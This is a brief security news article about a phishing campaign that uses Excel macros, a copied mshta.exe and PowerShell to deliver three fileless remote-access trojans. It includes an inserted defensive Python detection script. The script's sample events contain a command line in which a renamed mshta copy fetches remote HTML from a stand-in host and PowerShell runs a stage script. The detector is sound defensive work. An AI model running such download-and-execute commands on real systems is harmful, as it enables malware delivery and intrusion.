Three fileless malware spread through a new phishing campaign

May 25, 2022
Fileless Malware Phishing Campaign AveMariaRAT PandoraHVNC BitRAT Password Stealer

Researchers have uncovered a new phishing campaign that targets Windows users with three different fileless malware families capable of stealing critical information from the targeted systems.

The three fileless malware families are identified as AveMariaRAT, PandoraHVNC, and BitRAT.

The threat operators target several victims to steal usernames and passwords, capture screen recordings, and exfiltrate other critical information, such as bank credentials.

The threat actors deploy a phishing message that contains a payment report sent from an authentic source, along with a brief request to open the attached Excel document.

Subsequently, if the target opens the attached Excel file, the Microsoft Excel installed on the device can raise a security warning regarding the use of macros. If the device owner ignores the warning raised by Excel, one of the three fileless malware families will be delivered by the attachment.

The attached file contains VBA scripts and PowerShell commands that retrieve the malware and install it on the targeted device. Furthermore, the PowerShell code is divided into three parts, one for each of the three malware families.

The threat actors use the VBA code to access a remote HTML file through a copied “mshta[.]exe” command. The file also includes malicious JS code that is executed at a later stage of the attack.

The three fileless malware families are downloaded in a large PowerShell file to bypass security detections.

The malware is then deployed and run by the threat actors inside the target processes using the Process Hollowing technique.
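
A defender-side sketch of the chain described above (Excel macro, a copied mshta.exe fetching remote HTML, then PowerShell), added here as an example and not taken from the researchers' report. Field names follow Sysmon process-creation (Event ID 1) conventions; the rule names, paths, URL and sample events are constructed assumptions.

```python
import re
from ntpath import basename

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
URL = re.compile(r"https?://", re.I)

def scan(events):
    """Return {event index: [rule names]} for process-creation events in time order."""
    mshta_images = set()  # image paths already seen running as mshta, copies included
    results = {}
    for i, ev in enumerate(events):
        image = ev["Image"].lower()
        parent = ev["ParentImage"].lower()
        name = basename(image)
        # OriginalFileName comes from the PE version resource, so it survives a copy or rename.
        is_mshta = "mshta.exe" in (name, ev.get("OriginalFileName", "").lower())
        hits = []
        if is_mshta:
            mshta_images.add(image)
            if basename(parent) in OFFICE:
                hits.append("office_spawns_mshta")
            if not image.startswith(SYSTEM_DIRS):
                hits.append("mshta_copy_outside_system_dir")
            if URL.search(ev["CommandLine"]):
                hits.append("mshta_loads_remote_content")
        if name == "powershell.exe" and (parent in mshta_images or basename(parent) == "mshta.exe"):
            hits.append("mshta_spawns_powershell")
        if hits:
            results[i] = hits
    return results

# Constructed sample events for illustration (not taken from the campaign).
SAMPLE = [
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "ParentImage": r"C:\Windows\explorer.exe", "OriginalFileName": "Excel.exe",
     "CommandLine": r'EXCEL.EXE "C:\Users\a\Downloads\report.xlsm"'},
    {"Image": r"C:\Users\Public\helper.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "OriginalFileName": "MSHTA.EXE",
     "CommandLine": r"C:\Users\Public\helper.exe http://example.test/a.html"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\Public\helper.exe", "OriginalFileName": "PowerShell.EXE",
     "CommandLine": "powershell.exe -NoProfile -File stage.ps1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "OriginalFileName": "PowerShell.EXE",
     "CommandLine": "powershell.exe"},
]
print(scan(SAMPLE))
```

The copied binary is caught through its original file name even though it runs under a different name, and the PowerShell child is tied back to it by parent path.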

Malicious threat groups can now use three different forms of malware, indicating that these entities are incredibly focused on stealing critical information. The stolen information can allow other groups to use it as a vector for a more severe threat in the future.

Experts suggest that organisations worldwide should employ an anti-phishing solution. It is also recommended that firms train their personnel to identify such threats.
